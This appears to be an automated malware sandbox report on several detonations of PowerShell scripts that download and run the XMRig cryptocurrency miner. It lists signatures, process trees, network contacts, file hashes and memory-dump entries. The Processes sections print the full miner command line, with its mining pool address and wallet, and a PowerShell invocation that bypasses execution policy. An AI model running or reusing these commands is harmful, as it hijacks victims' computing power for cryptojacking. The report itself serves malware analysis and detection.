memory/4808-113-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-114-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-115-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-116-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

memory/4808-117-0x00007FF6D1770000-0x00007FF6D23A3000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:40

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1774s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/508-0-0x00007FF864DF3000-0x00007FF864DF4000-memory.dmp

memory/508-5-0x00000220A2E00000-0x00000220A2E22000-memory.dmp

memory/508-6-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp

memory/508-9-0x00000220BB5E0000-0x00000220BB656000-memory.dmp

memory/508-18-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pldnjqln.jkf.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/508-25-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp

memory/508-48-0x00000220BB390000-0x00000220BB3A2000-memory.dmp

memory/508-61-0x00000220BB380000-0x00000220BB38A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4556-90-0x0000012DD8A20000-0x0000012DD8A40000-memory.dmp

memory/508-92-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp

memory/508-91-0x00007FF864DF3000-0x00007FF864DF4000-memory.dmp

memory/508-94-0x00007FF864DF0000-0x00007FF8657DC000-memory.dmp

memory/4556-93-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-95-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-96-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-97-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-98-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-99-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-100-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-101-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-102-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-103-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-104-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-105-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-106-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-107-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-108-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-109-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-110-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-111-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-112-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-113-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-114-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-115-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-116-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-117-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-118-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-119-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-120-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-121-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-122-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-123-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-124-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-125-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-126-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-127-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-128-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-129-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-130-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-131-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-132-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-133-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-134-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-135-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-136-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-137-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-138-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-139-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-140-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-141-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-142-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-143-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-144-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-145-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-146-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-147-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-148-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-149-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-150-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-151-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-152-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-153-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-154-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-155-0x00007FF722B40000-0x00007FF723773000-memory.dmp

memory/4556-156-0x00007FF722B40000-0x00007FF723773000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 21:13

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1752s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 210.80.50.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/4092-4-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-5-0x00000268FC150000-0x00000268FC172000-memory.dmp

memory/4092-8-0x00000268FC380000-0x00000268FC3F6000-memory.dmp

memory/4092-9-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-18-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wbvuvca.yis.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4092-25-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-29-0x00007FFA56F63000-0x00007FFA56F64000-memory.dmp

memory/4092-30-0x00007FFA56F60000-0x00007FFA5794C000-memory.dmp

memory/4092-50-0x00000268FC2C0000-0x00000268FC2D2000-memory.dmp

memory/4092-63-0x00000268FC130000-0x00000268FC13A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/936-92-0x0000024EFC0F0000-0x0000024EFC110000-memory.dmp

memory/936-93-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-94-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-95-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-96-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-97-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-98-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-99-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-100-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-101-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-102-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-103-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-104-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-105-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-106-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-107-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-108-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-109-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-110-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-111-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-112-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-113-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-114-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-115-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-116-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-117-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-118-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-119-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-120-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-121-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-122-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-123-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-124-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-125-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-126-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-127-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-128-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-129-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-130-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-131-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-132-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-133-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-134-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-135-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-136-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-137-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-138-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-139-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-140-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-141-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-142-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-143-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-144-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-145-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-146-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-147-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-148-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-149-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-150-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-151-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-152-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-153-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-154-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

memory/936-155-0x00007FF656DB0000-0x00007FF6579E3000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:38

Platform

win11-20240419-en

Max time kernel

1794s

Max time network

1790s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/1300-0-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gflihdg0.i4o.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1300-9-0x000001EC71ED0000-0x000001EC71EF2000-memory.dmp

memory/1300-10-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-11-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-12-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-13-0x00007FF94CB73000-0x00007FF94CB75000-memory.dmp

memory/1300-14-0x00007FF94CB70000-0x00007FF94D632000-memory.dmp

memory/1300-16-0x000001EC71F60000-0x000001EC71F72000-memory.dmp

memory/1300-17-0x000001EC71F40000-0x000001EC71F4A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2972-48-0x000001BAD7F50000-0x000001BAD7F70000-memory.dmp

memory/2972-49-0x000001BAD7F80000-0x000001BAD7FA0000-memory.dmp

memory/2972-50-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-51-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-52-0x000001BB6A950000-0x000001BB6A970000-memory.dmp

memory/2972-53-0x000001BB6AB80000-0x000001BB6ABA0000-memory.dmp

memory/2972-54-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-56-0x000001BB6A950000-0x000001BB6A970000-memory.dmp

memory/2972-55-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-57-0x000001BB6AB80000-0x000001BB6ABA0000-memory.dmp

memory/2972-58-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-59-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-60-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-61-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-62-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-63-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-64-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-65-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-66-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-67-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

memory/2972-68-0x00007FF6B0060000-0x00007FF6B0C93000-memory.dmp

